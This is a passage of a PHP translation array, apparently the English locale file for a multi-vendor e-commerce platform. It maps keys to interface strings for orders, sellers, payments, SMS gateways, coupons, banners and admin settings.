'Unpaid', 'Print' => 'Print', 'invoice' => 'Invoice', 'Paid' => 'Paid', 'Method' => 'Method', 'reference' => 'Reference', 'Contact' => 'Contact', 'category_form' => 'Category form', 'category_table' => 'Category table', 'slug' => 'Slug', 'icon' => 'Icon', 'home_status' => 'Home status', 'information' => 'Information', 'no_account' => 'No account', 'register_control_your_order' => 'Register control your order', 'first_name' => 'First name', 'last_name' => 'Last name', 'phone_name' => 'Phone name', 'confirm_password' => 'Confirm password', 'i_agree_to_Your_terms' => 'I agree to Your terms', 'sing_up_with_google' => 'Sign up with google', 'sing_up_with_facebook' => 'Sign up with facebook', 'wish' => 'Wish', 'Select' => 'Select', 'Visit' => 'Visit', 'go_to' => 'Go to', 'chatbox' => 'Chatbox', 'OVERVIEW' => 'OVERVIEW', 'REVIEWS' => 'REVIEWS', 'Overall' => 'Overall', 'rating' => 'Rating', 5 => '5', 4 => '4', 3 => '3', 2 => '2', 1 => '1', 'product_review_not_available' => 'Product review not available', 'similar_products' => 'Similar products', 'sign-up' => 'Sign-up', 'choose_payment' => 'Choose payment', 'your_order_confirm' => 'Your order confirm', 'No' => 'No', 'Hello' => 'Hello', 'Items' => 'Items', 'text_fee' => 'Tax fee', 'Fee' => 'Fee', 'on_product' => 'On product', 'shipping_confirmation_email' => 'Shipping confirmation email', 'thanks_for_shopping_with' => 'Thanks for shopping with', 'go_to_shopping' => 'Go to shopping', 'Track' => 'Track', 'one_step_ahead' => 'One step ahead', 'update_information_to_continue' => 'Update information to continue', 'Marketing_Section' => 'Marketing Section', 'list' => 'List', 'withdraws' => 'Withdraws', 'Order#' => 'Order#', 'Add_new' => 'Add new', 'General_info' => 'General info', 'Sub_category' => 'Sub category', 'Sub_sub_category' => 'Sub sub category', 'Variations' => 'Variations', 'Product_price_&_stock' => 'Product price & stock', 'Unit_price' => 'Unit price', 'Purchase_price' => 'Purchase price', 'Meta_title' => 'Meta title', 'Meta_description' => 'Meta description', 'Meta_image' => 'Meta image', 'Youtube video link' => 'Youtube video link', 'optional please provide embed link not direct link' => 'Optional please provide embed link not direct link', 'Upload_product_images' => 'Upload product images', 'ratio 1:1' => 'Ratio 1:1', 'Upload_thumbnail' => 'Upload thumbnail', 'new' => 'New', 'Seller_details' => 'Seller details', 'Back_to_seller_list' => 'Back to seller list', '#SL' => 'SL', 'paid' => 'Paid', 'products' => 'Products', 'No_data_to_show' => 'No data to show', 'Review_list' => 'Review list', 'Search' => 'Search', 'SL' => 'SL', 'Rating' => 'Rating', 'Setting' => 'Setting', 'Transaction' => 'Transaction', 'withdraw_able_balance' => 'Withdraw able balance', 'Sales Commission' => 'Sales Commission', 'If sales commission is disabled here the system default commission will be applied' => 'If sales commission is disabled here the system default commission will be applied', 'Commission' => 'Commission', 'GST Number' => 'GST Number', 'If GST number is disabled here it will not show in invoice' => 'If GST number is disabled here it will not show in invoice', 'Number' => 'Number', 'Welcome_message' => 'Welcome message', 'Overall_statistics' => 'Overall statistics', 'Today s Statistics' => 'Today s Statistics', 'This Month s Statistics' => 'This Month s Statistics', 'for_app' => 'For app', 'Warning' => 'Warning', 'Follow the documentation to setup from app end' => 'Follow the documentation to setup from app end', 'click' => 'Click', 'here' => 'Here', 'Select Country code' => 'Select Country code', 'For mobile app only' => 'For mobile app only', 'web_admin' => 'Web admin', 'filter' => 'Filter', 'sort_by' => 'Sort by', 'Latest' => 'Latest', 'low_high' => 'Low high', 'Price' => 'Price', 'hight_low' => 'Hight low', 'a_z' => 'A z', 'z_a' => 'Z a', 'Choose' => 'Choose', 'most_favorite' => 'Most favorite', 'default' => 'Default', 'Callback_url' => 'Callback url', 'Callback_URI' => 'Callback URI', 'Settings' => 'Settings', 'Shipping_Method_Select' => 'Shipping Method Select', 'select' => 'Select', 'single_shipping_method' => 'Single shipping method', 'seller_wise_shipping_method' => 'Seller wise shipping method', 'choose_shipping_method' => 'Choose shipping method', 'continue_shopping' => 'Continue shopping', 'checkout' => 'Checkout', 'Sign_in_First_to_Apply_Coupon' => 'Sign in First to Apply Coupon', 'phone' => 'Phone', 'Enter_email_address_or_phone_number' => 'Enter email address or phone number', 'please_provide_valid_email_or_phone_number' => 'Please provide valid email or phone number', 'login_for_add_to_cart' => 'Login for add to cart', 'similar' => 'Similar', 'product_not_available' => 'Product not available', 'cart_empty' => 'Cart empty', 'check_orders' => 'Check orders', 'your_order_has_been_placed_successfully!' => 'Your order has been placed successfully!', 'order_no' => 'Order no', 'order_date' => 'Order date', 'Item' => 'Item', 'generate_invoice' => 'Generate invoice', 'coupon_discount' => 'Coupon discount', 'Seller_Details' => 'Seller Details', 'inhouse_shipping_method' => 'Inhouse shipping method', 'WISHLIST' => 'WISHLIST', 'successfully_added' => 'Successfully added', 'out_of_stock!' => 'Out of stock!', 'successfully_added!' => 'Successfully added!', 'already_added!' => 'Already added!', 'please_choose_all_the_options' => 'Please choose all the options', 'successfully_updated!' => 'Successfully updated!', 'successfully_removed' => 'Successfully removed', 'order_can_be_canceled_only_when_pending.' => 'Order can be canceled only when pending.', 'you_can_review_after_product_is_delivered!' => 'You can review after product is delivered!', 'you_can_review_after_the_product_is_delivered!' => 'You can review after the product is delivered!', 'shipping_id_is_required' => 'Shipping id is required', 'General Info' => 'General Info', 'maintenance_mode' => 'Maintenance mode', 'Currency Symbol Position' => 'Currency Symbol Position', 'gateway' => 'Gateway', 'setup' => 'Setup', 'releans_sms' => 'Releans sms', 'active' => 'Active', 'inactive' => 'Inactive', 'otp_template' => 'Otp template', 'twilio_sms' => 'Twilio sms', 'sid' => 'Sid', 'messaging_service_sid' => 'Messaging service sid', 'token' => 'Token', 'nexmo_sms' => 'Nexmo sms', 'api_secret' => 'Api secret', '2factor_sms' => '2factor sms', 'msg91_sms' => 'Msg91 sms', 'template_id' => 'Template id', 'authkey' => 'Authkey', 'time' => 'Time', 'linked_orders' => 'Linked orders', 'order' => 'Order', 'qty' => 'Qty', 'Details' => 'Details', 'order_id' => 'Order id', 'transaction_table' => 'Transaction table', 'payment_for' => 'Payment for', 'payer_id' => 'Payer id', 'payment_receiver_id' => 'Payment receiver id', 'paid_by' => 'Paid by', 'paid_to' => 'Paid to', 'payment_status' => 'Payment status', 'shop_does_not_exist' => 'Shop does not exist', 'Transactions' => 'Transactions', 'payer_info' => 'Payer info', 'receiver_info' => 'Receiver info', 'check_your_email' => 'Check your email', 'verify_information_to_continue' => 'Verify information to continue', 'verification_code' => 'Verification code', 'OTP' => 'OTP', 'verify' => 'Verify', 'please' => 'Please', 'provide' => 'Provide', 'verification' => 'Verification', 'sent_in_your_email' => 'Sent in your email', 'verification_done_successfully' => 'Verification done successfully', 'on' => 'On', 'off' => 'Off', 'email' => 'Email', 'order_verification_code' => 'Order verification code', 'Confirmed' => 'Confirmed', 'Canceled' => 'Canceled', 'registration_success_login_now' => 'Registration success login now', 'please_check_your_SMS_for_OTP' => 'Please check your SMS for OTP', 'sent_in_your_phone' => 'Sent in your phone', 'seller_is' => 'Seller is', 'customer' => 'Customer', 'order_amount' => 'Order amount', 'seller_amount' => 'Seller amount', 'admin_commission' => 'Admin commission', 'received_by' => 'Received by', 'delivered_by' => 'Delivered by', 'delivery_charge' => 'Delivery charge', 'tax' => 'Tax', 'wallet_statistics' => 'Wallet statistics', 'proceed' => 'Proceed', 'select_status' => 'Select status', 'disburse' => 'Disburse', 'hold' => 'Hold', 'seller_name' => 'Seller name', 'transaction_id' => 'Transaction id', 'unpaid' => 'Unpaid', 'sub_sub_category_form' => 'Sub sub category form', 'main' => 'Main', 'sub_sub_category_table' => 'Sub sub category table', 'sub_sub_category_name' => 'Sub sub category name', 'variation' => 'Variation', 'admin_wallet' => 'Admin wallet', 'commission_earned' => 'Commission earned', 'delivery_charge_earned' => 'Delivery charge earned', 'pending_amount' => 'Pending amount', 'total_tax_collected' => 'Total tax collected', 'flash_deal_b' => 'Flash deal b', 'want_tocancel_this_order ' => 'Want tocancel this order ', 'want_to_cancel_this_order ' => 'Want to cancel this order ', 'country' => 'Country', 'loader_gif' => 'Loader gif', 'commission_given' => 'Commission given', 'pending_withdraw' => 'Pending withdraw', 'total_withdraw' => 'Total withdraw', 'collected_cash' => 'Collected cash', 'total_collected_tax' => 'Total collected tax', 'Withdrawable_balance' => 'Withdrawable balance', 'login_first_for_next_steps' => 'Login first for next steps', 'shipping' => 'Shipping', 'method' => 'Method', 'processing' => 'Processing', 'payment' => 'Payment', 'pagination' => 'Pagination', 'settings' => 'Settings', 'seller_wallet' => 'Seller wallet', 'Application' => 'Application', 'Repeat' => 'Repeat', 'not match' => 'Not match', 'Apply' => 'Apply', 'Seller_request_for_open_a_shop.' => 'Seller request for open a shop.', 'Approve' => 'Approve', 'reject' => 'Reject', 'activate' => 'Activate', 'in-house_earning' => 'In-house earning', 'earning_statistics_for_business_analytics' => 'Earning statistics for business analytics', 'this_year_earning' => 'This year earning', 'seller_earnings' => 'Seller earnings', 'attribute' => 'Attribute', 'brand_list' => 'Brand list', 'Brand_update' => 'Brand update', 'brand_logo' => 'Brand logo', 'deny' => 'Deny', 'denied_note' => 'Denied note', 'Color' => 'Color', 'Total Price' => 'Total Price', 'phone_number' => 'Phone number', 'country_code_is_must' => 'Country code is must', 'profile_Info' => 'Profile Info', 'change_your_profile' => 'Change your profile', 'account_information' => 'Account information', 'new_password' => 'New password', 'shop_cart' => 'Shop cart', 'minimum_8_characters_long' => 'Minimum 8 characters long', 'contact_bold' => 'Contact bold', 'send_us_a_message' => 'Send us a message', 'your_name' => 'Your name', 'your_phone' => 'Your phone', 'Message' => 'Message', 'chat_with_seller' => 'Chat with seller', 'best_sellings' => 'Best sellings', 'Order_Management' => 'Order Management', 'Product_Management' => 'Product Management', 'Business_Section' => 'Business Section', 'user_Section' => 'User Section', 'Support_Section' => 'Support Section', 'Business_Settings' => 'Business Settings', 'Web_&_App_Settings' => 'Web & App Settings', 'Report_&_Analytics' => 'Report & Analytics', 'Employee_Section' => 'Employee Section', 'like_for_BD_880' => 'Like for BD 880', 'resubmit' => 'Resubmit', 'text_updated_successfully' => 'Text updated successfully', 'date' => 'Date', 'invoice_to' => 'Invoice to', 'no.' => 'No.', 'item_description' => 'Item description', 'unit_price' => 'Unit price', 'payment_details' => 'Payment details', 'sub_total' => 'Sub total', 'discount_on_product' => 'Discount on product', 'website' => 'Website', 'dashboard' => 'Dashboard', 'track_your_order' => 'Track your order', 'review' => 'Review', 'variant' => 'Variant', 'free_delivery' => 'Free delivery', 'money_back_gurranty' => 'Money back gurranty', 'days' => 'Days', 'money_back_guarantee' => 'Money back guarantee', 'genuine' => 'Genuine', 'authentic_payment' => 'Authentic payment', 'disabled' => 'Disabled', 'total_business_overview' => 'Total business overview', 'store' => 'Store', 'business' => 'Business', 'sold' => 'Sold', 'earning' => 'Earning', 'commission' => 'Commission', 'your_phone_number' => 'Your phone number', 'show_data_by_date_range' => 'Show data by date range', 'total_sale_of' => 'Total sale of', 'your_email' => 'Your email', 'welcome_back_to_seller_login' => 'Welcome back to seller login', 'view' => 'View', 'cancel' => 'Cancel', 'stock_out' => 'Stock out', 'hello' => 'Hello', 'reviews' => 'Reviews', 'color' => 'Color', 'please_provide_coupon_code' => 'Please provide coupon code', 'apply_code' => 'Apply code', 'discount' => 'Discount', 'total_price' => 'Total price', 'add_to_cart' => 'Add to cart', 'repeat_password' => 'Repeat password', 'shop_name' => 'Shop name', 'shop_address' => 'Shop address', 'already_have_an_account _login.' => 'Already have an account login.', 'order_list' => 'Order list', 'inhouse_orders_only' => 'Inhouse orders only', 'processed' => 'Processed', 'order_filter_success' => 'Order filter success', 'Push Notification Setup' => 'Push Notification Setup', 'Firebase Push Notification Setup' => 'Firebase Push Notification Setup', 'Server Key' => 'Server Key', 'FCM Project ID' => 'FCM Project ID', 'Push Messages' => 'Push Messages', 'Order Pending Message' => 'Order Pending Message', 'Order Confirmation Message' => 'Order Confirmation Message', 'Order Processing Message' => 'Order Processing Message', 'Order out for delivery Message' => 'Order out for delivery Message', 'Order Delivered Message' => 'Order Delivered Message', 'Order Returned Message' => 'Order Returned Message', 'Order Failed Message' => 'Order Failed Message', 'sub_category_form' => 'Sub category form', 'sub_category_table' => 'Sub category table', 'Sub Category deleted Successfully.' => 'Sub Category deleted Successfully.', 'Search by Sub Sub Category' => 'Search by Sub Sub Category', 'Are you sure to delete this ' => 'Are you sure to delete this ', 'You wont be able to revert this!' => 'You wont be able to revert this!', 'Yes delete it!' => 'Yes delete it!', 'Sub Sub Category deleted Successfully.' => 'Sub Sub Category deleted Successfully.', 'Are you sure ' => 'Are you sure ', 'Category deleted Successfully.' => 'Category deleted Successfully.', 'send' => 'Send', 'Your Message Send Successfully' => 'Your Message Send Successfully', 'Expand menu' => 'Expand menu', 'view_more' => 'View more', 'select_shipping_method_first' => 'Select shipping method first', 'Shipping Address Choose' => 'Shipping Address Choose', 'Admin or Employee Login' => 'Admin or Employee Login', 'seller_login' => 'Seller login', 'drop_here' => 'Drop here', 'input_png_or_jpg' => 'Input png or jpg', 'file_size_too_big' => 'File size too big', 'paymob_accept' => 'Paymob accept', 'configure' => 'Configure', 'iframe_id' => 'Iframe id', 'integration_id' => 'Integration id', 'HMAC' => 'HMAC', 'EGP_currency_is_required' => 'EGP currency is required', 'write_something' => 'Write something', 'Enter_Attribute_Name' => 'Enter Attribute Name', 'Search_by_Attribute_Name' => 'Search by Attribute Name', 'Are_you_sure_to_delete_this' => 'Are you sure to delete this', 'You_will not_be_able_to_revert_this' => 'You will not be able to revert this', 'Yes' => 'Yes', 'delete_it' => 'Delete it', 'Attribute_deleted_successfully' => 'Attribute deleted successfully', 'Search_by_Banner_Type' => 'Search by Banner Type', 'Banner_published_successfully' => 'Banner published successfully', 'Banner_unpublished_successfully' => 'Banner unpublished successfully', 'Are_you_sure_delete_this_banner' => 'Are you sure delete this banner', 'You_will_not_be_able_to_revert_this' => 'You will not be able to revert this', 'Banner_deleted_successfully' => 'Banner deleted successfully', 'Main_Banner_updated_Successfully' => 'Main Banner updated Successfully', 'Secondary_Banner_updated_Successfully' => 'Secondary Banner updated Successfully', 'Popup_Banner_updated_Successfully' => 'Popup Banner updated Successfully', 'Ex' => 'Ex', 'LUX' => 'LUX', 'are_you_sure ' => 'Are you sure ', 'You_will_not_be_able_to_revert_this!' => 'You will not be able to revert this!', 'Brand_deleted_successfully' => 'Brand deleted successfully', 'Brands' => 'Brands', 'Are_you_sure_delete_this_brand' => 'Are you sure delete this brand', 'Are_you_sure' => 'Are you sure', 'Category_deleted_Successfully.' => 'Category deleted Successfully.', 'Sub_Category' => 'Sub Category', 'Search_by_Sub_Category' => 'Search by Sub Category', 'Are_you_sure_to_delete_this_sub_category' => 'Are you sure to delete this sub category', 'Sub_Category_deleted_Successfully.' => 'Sub Category deleted Successfully.', 'New_Sub_Sub_Category' => 'New Sub Sub Category', 'Search_by_Sub_Sub_Category' => 'Search by Sub Sub Category', 'Are_you_sure_to_delete_this ' => 'Are you sure to delete this ', 'You_wont_be_able_to_revert_this!' => 'You wont be able to revert this!', 'Sub_Sub_Category_Deleted_Successfully' => 'Sub Sub Category Deleted Successfully', 'paymob_supports_EGP_currency' => 'Paymob supports EGP currency', 'coupon_code' => 'Coupon code', 'Overall Statistics' => 'Overall Statistics', 'Todays Statistics' => 'Todays Statistics', 'This Months Statistics' => 'This Months Statistics', 'Withdraw Request' => 'Withdraw Request', 'Request' => 'Request', 'Earning statistics for business analytics' => 'Earning statistics for business analytics', 'This Year Earning' => 'This Year Earning', 'Your Earnings' => 'Your Earnings', 'Commission Given' => 'Commission Given', 'Update your bank info first!' => 'Update your bank info first!', 'Order Details' => 'Order Details', 'Order details' => 'Order details', 'Print invoice' => 'Print invoice', 'Q' => 'Q', 'Contact info' => 'Contact info', 'Are you sure Change this ' => 'Are you sure Change this ', 'Status Change successfully' => 'Status Change successfully', 'Yes Change it!' => 'Yes Change it!', 'Order is already delivered You can not change it !!' => 'Order is already delivered You can not change it !!', 'Status Change successfully !' => 'Status Change successfully !', 'Product List' => 'Product List', 'Status updated successfully' => 'Status updated successfully', 'Status updated failed. Product must be approved' => 'Status updated failed. Product must be approved', 'Please only input png or jpg type file' => 'Please only input png or jpg type file', 'File size too big' => 'File size too big', 'product updated successfully!' => 'Product updated successfully!', 'Meta Title' => 'Meta Title', 'Meta Description' => 'Meta Description', 'Meta Image' => 'Meta Image', 'optional please provide embed link not direct link.' => 'Optional please provide embed link not direct link.', 'Remove' => 'Remove', 'Instructions' => 'Instructions', 'Download the format file and fill it with proper data' => 'Download the format file and fill it with proper data', 'You can download the example file to understand how the data must be filled' => 'You can download the example file to understand how the data must be filled', 'Once you have downloaded and filled the format file upload it in the form below and submit' => 'Once you have downloaded and filled the format file upload it in the form below and submit', 'After uploading products you need to edit them and set products images and choices' => 'After uploading products you need to edit them and set products images and choices', 'You can get brand and category id from their list please input the right ids' => 'You can get brand and category id from their list please input the right ids', 'Import Products File' => 'Import Products File', 'Download Format' => 'Download Format', 'Review List' => 'Review List', 'Product reviews' => 'Product reviews', 'star' => 'Star', 'Current Stock' => 'Current Stock', 'Available color' => 'Available color', 'Product Image' => 'Product Image', 'Reviewer' => 'Reviewer', 'Chatting List' => 'Chatting List', 'edit' => 'Edit', 'Bank info' => 'Bank info', 'Edit Bank Info' => 'Edit Bank Info', 'Bank Name' => 'Bank Name', 'Branch Name' => 'Branch Name', 'Holder Name' => 'Holder Name', 'Account No' => 'Account No', 'Edit Shop Info' => 'Edit Shop Info', 'Shop Name' => 'Shop Name', 'Address' => 'Address', 'Ratio' => 'Ratio', 'Are you sure delete this ' => 'Are you sure delete this ', 'Shipping Method deleted successfully' => 'Shipping Method deleted successfully', 'Once deleted you will not be able to recover this' => 'Once deleted you will not be able to recover this', 'warning' => 'Warning', 'FAQ' => 'FAQ', 'frequently_asked_question' => 'Frequently asked question', 'Track Order Result' => 'Track Order Result', 'My Wishlists' => 'My Wishlists', 'Image ratio should be' => 'Image ratio should be', 'add_new_address' => 'Add new address', 'permanent' => 'Permanent', 'Office' => 'Office', 'State' => 'State', 'ADDRESSES' => 'ADDRESSES', 'My Support Tickets' => 'My Support Tickets', 'submit_new_ticket' => 'Submit new ticket', 'you_will_get_response' => 'You will get response', 'problem' => 'Problem', 'partner_request' => 'Partner request', 'Complaint' => 'Complaint', 'inquiry' => 'Inquiry', 'choose_priority' => 'Choose priority', 'Urgent' => 'Urgent', 'High' => 'High', 'Medium' => 'Medium', 'Low' => 'Low', 'describe_your_issue' => 'Describe your issue', 'submit_a_ticket' => 'Submit a ticket', 'Topic' => 'Topic', 'submition_date' => 'Submition date', 'add_new_ticket' => 'Add new ticket', 'Welcome To' => 'Welcome To', 'Previous' => 'Previous', 'All Brands Page' => 'All Brands Page', 'items found' => 'Items found', 'All Category Page' => 'All Category Page', 'Select your desire category' => 'Select your desire category', 'View Products' => 'View Products', 'Contact Us' => 'Contact Us', 'Contact Number' => 'Contact Number', 'Short title' => 'Short title', 'Privacy policy' => 'Privacy Policy', 'Terms & Conditions' => 'Terms & Conditions', 'Terms and Condition' => 'Terms and Conditions', 'About Us' => 'About Us', 'About Our Company' => 'About Our Company', 'My Address' => 'My Address', 'No data found' => 'No data found', 'My Order List' => 'My Order List', 'updated_successfully' => 'Updated successfully', 'No conversetion found' => 'No conversetion found', 'shipping_method_update' => 'Shipping method update', 'Admin | Login' => 'Admin | Login', 'Software version' => 'Software version', 'Search orders' => 'Search orders', 'Search Product Name' => 'Search Product Name', 'Featured status updated successfully' => 'Featured status updated successfully', 'New Product' => 'New Product', 'EX' => 'EX', 'After uploading products you need to edit them and set product images and choices' => 'After uploading products you need to edit them and set product images and choices', 'No data to show' => 'No data to show', 'Product in wishlist report' => 'Product in wishlist report', 'In-House' => 'In-House', 'Filter' => 'Filter', 'Asc/Dsc' => 'Asc/Dsc', 'Total in Wishlist' => 'Total in Wishlist', 'Discount_on_Purchase' => 'Discount on Purchase', 'start date' => 'Start date', 'expire date' => 'Expire date', 10 => '10', 'minimum purchase' => 'Minimum purchase', 'maximum discount' => 'Maximum discount', 'Search by Title or Code or Discount Type' => 'Search by Title or Code or Discount Type', 'New notification' => 'New notification', 'Choose file' => 'Choose file', 'Search by Title' => 'Search by Title', 'Are you sure delete this' => 'Are you sure delete this', 'You will not be able to revert this' => 'You will not be able to revert this', 'Yes delete it' => 'Yes delete it', 'notification deleted successfully' => 'Notification deleted successfully', 'Add new' => 'Add new', 'Add Product' => 'Add Product', 'Deal of the day form' => 'Deal of the day form', 'Product stock report' => 'Product stock report', 'ASE/DESC' => 'ASE/DESC', 'Total Stock' => 'Total Stock', 'Search by Product or Customer' => 'Search by Product or Customer', 'Search by Name or Phone or Email' => 'Search by Name or Phone or Email', 'Search by Name or Email or Phone' => 'Search by Name or Email or Phone', 'Search_by_Name_or_Mobile_No_or_Email' => 'Search by Name or Mobile No or Email', 'Are_you_sure_delete_this' => 'Are you sure delete this', 'Contact_deleted_successfully' => 'Contact deleted successfully', 'Search by Subject' => 'Search by Subject', 'Default Sales Commission' => 'Default Sales Commission', 'Seller Registration' => 'Seller Registration', 'Seller Registration on/off' => 'Seller Registration on/off', 'Turn on' => 'Turn on', 'Turn off' => 'Turn off', 'Copy URI' => 'Copy URI', 'Copied to the clipboard' => 'Copied to the clipboard', 'EX of SMS provider s template : your OTP is XXXX here please check' => 'EX of SMS provider s template : your OTP is XXXX here please check', 'NB : XXXX will be replace with otp' => 'NB : XXXX will be replace with otp', 'NB : Keep an OTP variable in your SMS providers OTP Template' => 'NB : Keep an OTP variable in your SMS providers OTP Template', 'Shipping Method' => 'Shipping Method', '4 to 6 days' => '4 to 6 days', 'Are you sure to delete this' => 'Are you sure to delete this', 'Credentials SetUp' => 'Credentials SetUp', 'Google API Set up Instructions' => 'Google API Set up Instructions', 'Go to the Credentials page' => 'Go to the Credentials page', 'Click' => 'Click', 'Select the' => 'Select the', 'type' => 'Type', 'Name your OAuth 2.0 client' => 'Name your OAuth 2.0 client', 'provide the' => 'Provide the', 'from below and click' => 'From below and click', 'Copy' => 'Copy', 'paste in the input filed below and' => 'Paste in the input filed below and', 'Close' => 'Close', 'Facebook API Set up Instructions' => 'Facebook API Set up Instructions', 'Log in into your Facebook account (if you’re not)' => 'Log in into your Facebook account (if you’re not)', 'Go to the facebook developer page and' => 'Go to the facebook developer page and', 'Go to' => 'Go to', 'from Navbar' => 'From Navbar', 'From Register tab press' => 'From Register tab press', 'From Verify Account tab' => 'From Verify Account tab', 'provide phone number & press' => 'Provide phone number & press', 'An' => 'An', 'will be sent to your number provide that' => 'Will be sent to your number provide that', 'and press' => 'And press', 'From Contact Info tab provide' => 'From Contact Info tab provide', 'check in' => 'Check in', 'From About You tab press' => 'From About You tab press', 'Select an app type' => 'Select an app type', 'Complete the' => 'Complete the', 'form & press' => 'Form & press', 'From' => 'From', 'press' => 'Press', 'Provide' => 'Provide', 'Now go to' => 'Now go to', 'from left sidebar' => 'From left sidebar', 'Fill the form and press' => 'Fill the form and press', 'toggle button from the top' => 'Toggle button from the top', 'Now copy' => 'Now copy', 'Twitter API Set up Instructions' => 'Twitter API Set up Instructions', 'Instruction will be available very soon' => 'Instruction will be available very soon', 'Add New Currency' => 'Add New Currency', 'Enter currency Name' => 'Enter currency Name', 'Enter currency symbol' => 'Enter currency symbol', 'Enter currency code' => 'Enter currency code', 'Enter currency exchange rate' => 'Enter currency exchange rate', 'Search Currency Name or Currency Code' => 'Search Currency Name or Currency Code', 'Default' => 'Default', 'All input field is required' => 'All input field is required', 'Left' => 'Left', 'Right' => 'Right', 'Admin Shop Banner' => 'Admin Shop Banner', '6:1' => '6:1', 'Are you sure' => 'Are you sure', 'Be careful before you turn on/off maintenance mode' => 'Be careful before you turn on/off maintenance mode', 'Both Phone & Email verification can not be active at a time' => 'Both Phone & Email verification can not be active at a time', 'Add Help Topic' => 'Add Help Topic', 'Type Question' => 'Type Question', 'Type Answer' => 'Type Answer', 'Edit Modal Help Topic' => 'Edit Modal Help Topic', 'Are you sure delete this FAQ' => 'Are you sure delete this FAQ', 'FAQ deleted successfully' => 'FAQ deleted successfully', 'Social Media' => 'Social Media', 'Instagram' => 'Instagram', 'Facebook' => 'Facebook', 'Twitter' => 'Twitter', 'LinkedIn' => 'LinkedIn', 'Pinterest' => 'Pinterest', 'Google plus' => 'Google plus', 'Enter Social Media Link' => 'Enter Social Media Link', 'Social Name Is Requeired' => 'Social Name Is Requeired', 'Social Link Is Requeired' => 'Social Link Is Requeired', 'Social Media Already taken' => 'Social Media Already taken', 'Social Media inserted Successfully' => 'Social Media inserted Successfully', 'Social info updated Successfully' => 'Social info updated Successfully', 'Are you sure delete this social media' => 'Are you sure delete this social media', 'Social media deleted Successfully' => 'Social media deleted Successfully', 'Invalid date range' => 'Invalid date range', 'Show data by date range' => 'Show data by date range', 'InHouse product sale report' => 'InHouse product sale report', 'Total Sale' => 'Total Sale', 'Seller product sale report' => 'Seller product sale report', 'My Shopping Cart' => 'My Shopping Cart', 'Something went wrong!' => 'Something went wrong!', 'Please fill all required fields' => 'Please fill all required fields', 'Choose Payment Method' => 'Choose Payment Method', 'Page Not found' => 'Page Not found', 'We are sorry the page you requested could not be found' => 'We are sorry the page you requested could not be found', 'Please go back to the homepage' => 'Please go back to the homepage', 'HOME' => 'HOME', 'Currency changed to' => 'Currency changed to', 'Item has been removed from cart' => 'Item has been removed from cart', 'Sorry the minimum value was reached' => 'Sorry the minimum value was reached', 'Sorry stock limit exceeded' => 'Sorry stock limit exceeded', 'Shop Page' => 'Shop Page', 'Search Product' => 'Search Product', 'send successfully' => 'Send successfully', 'Close sidebar' => 'Close sidebar', 'product added successfully' => 'Product added successfully', 'Are you sure Change this' => 'Are you sure Change this', 'Yes Change it' => 'Yes Change it', 'Order is already delivered You can not change it' => 'Order is already delivered You can not change it', 'Login' => 'Login', 'Please ReType Password' => 'Please ReType Password', 'Passwords do not match' => 'Passwords do not match', 'password Must Be 6 Character' => 'Password Must Be 6 Character', 'Passwords match' => 'Passwords match', 'Ready to Leave' => 'Ready to Leave', 'Select Logout below if you are ready to end your current session' => 'Select Logout below if you are ready to end your current session', 'Logout' => 'Logout', 'Update option is disabled for demo' => 'Update option is disabled for demo', 'Order List' => 'Order List', 'Brand Add' => 'Brand Add', 'Brand List' => 'Brand List', 'Product Bulk Import' => 'Product Bulk Import', 'Coupon Add' => 'Coupon Add', 'Add new notification' => 'Add new notification', 'Flash Deal' => 'Flash Deal', 'Deal Page' => 'Deal Page', 'Feature Deal' => 'Feature Deal', 'Product stock Report' => 'Product stock Report', 'Product in Wishlist Report' => 'Product in Wishlist Report', 'Seller List' => 'Seller List', 'Customer List' => 'Customer List', 'Contact List' => 'Contact List', 'Support Ticket' => 'Support Ticket', 'Seller Information' => 'Seller Information', 'Image uploaded successfully' => 'Image uploaded successfully', 'Error Something went wrong' => 'Error Something went wrong', 'Choose Image' => 'Choose Image', 'This is not an image file' => 'This is not an image file', 'Payment Method' => 'Payment Method', 'SMS Module Setup' => 'SMS Module Setup', 'Social Login' => 'Social Login', 'Web Config' => 'Web Config', 'Mail Config' => 'Mail Config', 'FCM Settings' => 'FCM Settings', 'Terms & Condition' => 'Terms & Conditions', 'Earning Report' => 'Earning Report', 'Order Report' => 'Order Report', 'Inhouse product sale Report' => 'Inhouse product sale Report', 'Seller product sale Report' => 'Seller product sale Report', 'Create Role' => 'Create Role', 'Employee Add' => 'Employee Add', 'Employee List' => 'Employee List', 'Do you want to logout' => 'Do you want to logout', 'Sign out' => 'Sign out', 'Copyright' => 'Copyright', 'Search by Product Name' => 'Search by Product Name', 'New Request' => 'New Request', 'Want to delete this item' => 'Want to delete this item', 'Chatting Page' => 'Chatting Page', 'Send a message' => 'Send a message', 'No Message available' => 'No Message available', 'Bank Info View' => 'Bank Info View', 'Shop view' => 'Shop view', 'no_items_in_basket' => 'No items in basket', 'Flash Deal Products' => 'Flash Deal Products', 'Are you sure you want to Delete' => 'Are you sure you want to Delete', 'Address Update Successfully' => 'Address Update Successfully', 'All input field required' => 'All input field required', 'Do you want to delete this ' => 'Do you want to delete this ', 'Language Translate' => 'Language Translate', 'Key removed successfully' => 'Key removed successfully', 'Search by orders id or transaction id' => 'Search by orders id or transaction id', 'Expand cart' => 'Expand cart', 'Checkout' => 'Checkout', 'Coupon code' => 'Coupon code', 'Credit / Debit card ( Stripe )' => 'Credit / Debit card ( Stripe )', 'Error' => 'Error', 'No Product Found' => 'No Product Found', 'All Seller Page' => 'All Seller Page', 'Shop name' => 'Shop name', 'All_Sellers' => 'All Sellers', 'all' => 'All', 'View_more' => 'View more', 'Flash Deal Update' => 'Flash Deal Update', 'Update Deal' => 'Update Deal', 'Feature Deal Update' => 'Feature Deal Update', 'Deal Update' => 'Deal Update', 'Deal of the Day' => 'Deal of the Day', 'Deal Product' => 'Deal Product', 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation' => 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation', 'Think before you proceed' => 'Think before you proceed', 'GST' => 'GST', 'comment' => 'Comment', 'attachment' => 'Attachment', 'Top' => 'Top', 'admin@admin.com' => 'Admin@admin.com', 12345678 => '12345678', 'successfully updated!' => 'Successfully updated!', 'Product ID is required!' => 'Product ID is required!', 'Order Placed' => 'Order Placed', 'Notification mail for order placed' => 'Notification mail for order placed', 'We have sent you this email in response to your order placed. You will be able to see your order status after login to your account' => 'We have sent you this email in response to your order placed. You will be able to see your order status after login to your account', 'Your order ID' => 'Your order ID', 'If you need help or you have any other questions feel free to email us' => 'If you need help or you have any other questions feel free to email us', 'successfully added!' => 'Successfully added!', 'order_placed_successfully' => 'Order placed successfully', 'Invalid credential or account no verified yet' => 'Invalid credential or account no verified yet', 'Copied 